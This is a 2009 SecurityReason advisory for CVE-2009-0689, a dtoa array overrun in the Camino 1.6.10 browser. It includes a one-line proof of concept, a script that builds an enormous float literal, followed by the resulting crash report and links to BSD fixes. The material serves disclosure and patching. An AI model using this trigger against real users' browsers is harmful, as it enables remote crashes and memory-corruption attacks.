Camino 1.6.10 Remote Array Overrun

`[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]  
  
Author: Maksymilian Arciemowicz and sp3x  
http://SecurityReason.com  
Date:  
- Dis.: 07.05.2009  
- Pub.: 11.12.2009  
  
CVE: CVE-2009-0689  
CWE: CWE-119  
Risk: High  
Remote: Yes  
  
Affected Software:  
- Camino 1.6.10  
  
Fixed in:  
- Camino 2.0 <=  
  
NOTE: Prior versions may also be affected.  
  
Original URL:  
http://securityreason.com/achievement_securityalert/76  
  
  
--- 0.Description ---  
Camino (from the Spanish word camino meaning "way", "path" or "road") is  
a free, open source, GUI-based Web browser based on Mozilla's Gecko  
layout engine and specifically designed for the Mac OS X operating  
system. In place of an XUL-based user interface used by most  
Mozilla-based applications, Camino uses Mac-native Cocoa APIs, although  
it does not use native text boxes.  
  
--- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ---  
The main problem exist in dtoa implementation. Camino has the same dtoa  
as Firefox, SeaMonkey, Chrome, Opera etc.  
and it is the same like SREASONRES:20090625.  
  
http://securityreason.com/achievement_securityalert/63  
  
but fix for SREASONRES:20090625, used by openbsd was not good.  
More information about fix for openbsd and similars SREASONRES:20091030,  
  
http://securityreason.com/achievement_securityalert/69  
  
We can create any number of float, which will overwrite the memory. In  
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and  
it is possible to call 16<= elements of freelist array.  
  
  
--- 2. Proof of Concept (PoC) ---  
-----------------------  
<script>  
var a=0.<?php echo str_repeat("1",296450); ?>;  
</script>  
-----------------------  
  
Process: Camino [153]  
Path: /Volumes/Camino/Camino.app/Contents/MacOS/Camino  
Identifier: org.mozilla.camino  
Version: 1.6.10 (1609.09.25)  
Code Type: X86 (Native)  
Parent Process: launchd [92]  
  
Date/Time: 2009-11-06 12:57:24.698 -0800  
OS Version: Mac OS X 10.5.6 (9G55)  
Report Version: 6  
  
Exception Type: EXC_BAD_ACCESS (SIGSEGV)  
Exception Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590  
Crashed Thread: 0  
  
Thread 0 Crashed:  
0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list  
+ 235  
1 libSystem.B.dylib 0x01d7710d szone_malloc + 180  
2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81  
3 libSystem.B.dylib 0x01d76fac malloc + 55  
4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220  
5 org.mozilla.camino 0x00389bac RuleHash::RuleHash(int) + 282  
6 org.mozilla.camino 0x0038ae0e  
nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146  
7 org.mozilla.camino 0x0038b215  
nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27  
8 org.mozilla.camino 0x003afbd0  
EnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24  
9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules(int  
(*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37  
10 org.mozilla.camino 0x003b0c77  
nsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*,  
nsStyleContext*, nsICSSPseudoComparator*) + 123  
11 org.mozilla.camino 0x002cc924  
nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134  
12 org.mozilla.camino 0x002f617b  
PresShell::InitialReflow(int, int) + 1151  
13 org.mozilla.camino 0x005a90d4  
nsContentSink::StartLayout(int) + 342  
14 org.mozilla.camino 0x00483354  
HTMLContentSink::StartLayout() + 82  
15 org.mozilla.camino 0x00486cb7  
HTMLContentSink::OpenBody(nsIParserNode const&) + 193  
16 org.mozilla.camino 0x001a60e8  
CNavDTD::OpenBody(nsCParserNode const*) + 54  
17 org.mozilla.camino 0x001a8b53  
CNavDTD::HandleDefaultStartToken(CToken*, nsHTMLTag, nsCParserNode*) + 393  
18 org.mozilla.camino 0x001aa3e5  
CNavDTD::HandleStartToken(CToken*) + 623  
19 org.mozilla.camino 0x001aaaa2  
CNavDTD::HandleToken(CToken*, nsIParser*) + 1358  
20 org.mozilla.camino 0x001a9a4d  
CNavDTD::BuildModel(nsIParser*, nsITokenizer*, nsITokenObserver*,  
nsIContentSink*) + 165  
21 org.mozilla.camino 0x001a94ee  
CNavDTD::DidBuildModel(unsigned int, int, nsIParser*, nsIContentSink*) + 550  
22 org.mozilla.camino 0x001b5e28  
nsParser::DidBuildModel(unsigned int) + 90  
23 org.mozilla.camino 0x001b83c7 nsParser::ResumeParse(int,  
int, int) + 661  
24 org.mozilla.camino 0x001b59a8  
nsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 128  
25 org.mozilla.camino 0x002076a0  
nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, unsigned  
int) + 88  
26 org.mozilla.camino 0x000f522a  
nsFileChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 78  
27 org.mozilla.camino 0x000baf18  
nsInputStreamPump::OnStateStop() + 88  
28 org.mozilla.camino 0x000bb49d  
nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) + 133  
29 libxpcom_core.dylib 0x00cb7d4d nsAStreamCopier::Process()  
+ 751  
30 libxpcom_core.dylib 0x00c8f251 PL_HandleEvent + 21  
31 libxpcom_core.dylib 0x00c8f50a PL_ProcessPendingEvents + 103  
32 com.apple.CoreFoundation 0x014455f5 CFRunLoopRunSpecific + 3141  
33 com.apple.CoreFoundation 0x01445cd8 CFRunLoopRunInMode + 88  
34 com.apple.HIToolbox 0x02d8b2c0 RunCurrentEventLoopInMode  
+ 283  
35 com.apple.HIToolbox 0x02d8b0d9 ReceiveNextEventCommon + 374  
36 com.apple.HIToolbox 0x02d8af4d  
BlockUntilNextEventMatchingListInMode + 106  
37 com.apple.AppKit 0x05e94d7d _DPSNextEvent + 657  
38 com.apple.AppKit 0x05e94630 -[NSApplication  
nextEventMatchingMask:untilDate:inMode:dequeue:] + 128  
39 com.apple.AppKit 0x05e8d66b -[NSApplication run] + 795  
40 com.apple.AppKit 0x05e5a8a4 NSApplicationMain + 574  
41 org.mozilla.camino 0x0000364c main + 196  
42 org.mozilla.camino 0x00002f1e _start + 216  
43 org.mozilla.camino 0x00002e45 start + 41  
  
Thread 1:  
0 libSystem.B.dylib 0x01dad30a  
select$DARWIN_EXTSN$NOCANCEL + 10  
1 libnspr4.dylib 0x00d3940e poll + 258  
2 libnspr4.dylib 0x00d35cc6 PR_Poll + 134  
3 org.mozilla.camino 0x000cb897  
nsSocketTransportService::Poll(unsigned int*) + 99  
4 org.mozilla.camino 0x000cbe75  
nsSocketTransportService::Run() + 497  
5 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41  
6 libnspr4.dylib 0x00d37309 _pt_root + 150  
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
8 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 2:  
0 libSystem.B.dylib 0x01d76226  
semaphore_timedwait_signal_trap + 10  
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244  
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47  
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207  
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75  
5 libxpcom_core.dylib 0x00c93be2 TimerThread::Run() + 74  
6 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41  
7 libnspr4.dylib 0x00d37309 _pt_root + 150  
8 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
9 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 3:  
0 libSystem.B.dylib 0x01d76226  
semaphore_timedwait_signal_trap + 10  
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244  
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47  
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207  
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75  
5 org.mozilla.camino 0x000b539d  
nsIOThreadPool::ThreadFunc(void*) + 145  
6 libnspr4.dylib 0x00d37309 _pt_root + 150  
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
8 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 4:  
0 libSystem.B.dylib 0x01d7d3ae __semwait_signal + 10  
1 libSystem.B.dylib 0x01da7d0d pthread_cond_wait$UNIX2003  
+ 73  
2 com.apple.QuartzCore 0x052c6ab9 fe_fragment_thread + 54  
3 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
4 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 5:  
0 libSystem.B.dylib 0x01d76226  
semaphore_timedwait_signal_trap + 10  
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244  
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47  
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207  
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75  
5 org.mozilla.camino 0x000d43ce  
nsHostResolver::GetHostToLookup(nsHostRecord**) + 212  
6 org.mozilla.camino 0x000d4b2d  
nsHostResolver::ThreadFunc(void*) + 123  
7 libnspr4.dylib 0x00d37309 _pt_root + 150  
8 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
9 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 6:  
0 libSystem.B.dylib 0x01dc56f2 select$DARWIN_EXTSN + 10  
1 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
2 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 7:  
0 libSystem.B.dylib 0x01d76226  
semaphore_timedwait_signal_trap + 10  
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244  
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47  
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207  
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75  
5 org.mozilla.camino 0x000b539d  
nsIOThreadPool::ThreadFunc(void*) + 145  
6 libnspr4.dylib 0x00d37309 _pt_root + 150  
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
8 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 0 crashed with X86 Thread State (32-bit):  
eax: 0xf8051a22 ebx: 0x01d7e255 ecx: 0x07e8fca0 edx: 0x7e33d590  
edi: 0x07d5c000 esi: 0x07e00000 ebp: 0xbfffe208 esp: 0xbfffe190  
ss: 0x0000001f efl: 0x00010206 eip: 0x01d7e325 cs: 0x00000017  
ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037  
cr2: 0x7e33d590  
  
--- 3. SecurityReason Note ---  
Officialy SREASONRES:20090625 has been detected in:  
- OpenBSD  
- NetBSD  
- FreeBSD  
- MacOSX  
- Google Chrome  
- Mozilla Firefox  
- Mozilla Seamonkey  
- Mozilla Thunderbird  
- Mozilla Sunbird  
- Mozilla Camino  
- KDE (example: konqueror)  
- Opera  
- K-Meleon  
- F-Lock  
  
This list is not yet closed.  
  
--- 4. Fix ---  
NetBSD fix (optimal):  
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h  
  
OpenBSD fix:  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c  
  
  
--- 5. Credits ---  
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.  
  
  
--- 6. Greets ---  
Infospec p_e_a pi3  
  
  
--- 7. Contact ---  
Email:  
- cxib {a.t] securityreason [d0t} com  
- sp3x {a.t] securityreason [d0t} com  
  
GPG:  
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
- http://securityreason.com/key/sp3x.gpg  
  
http://securityreason.com/  
http://securityreason.pl/  
  
  
`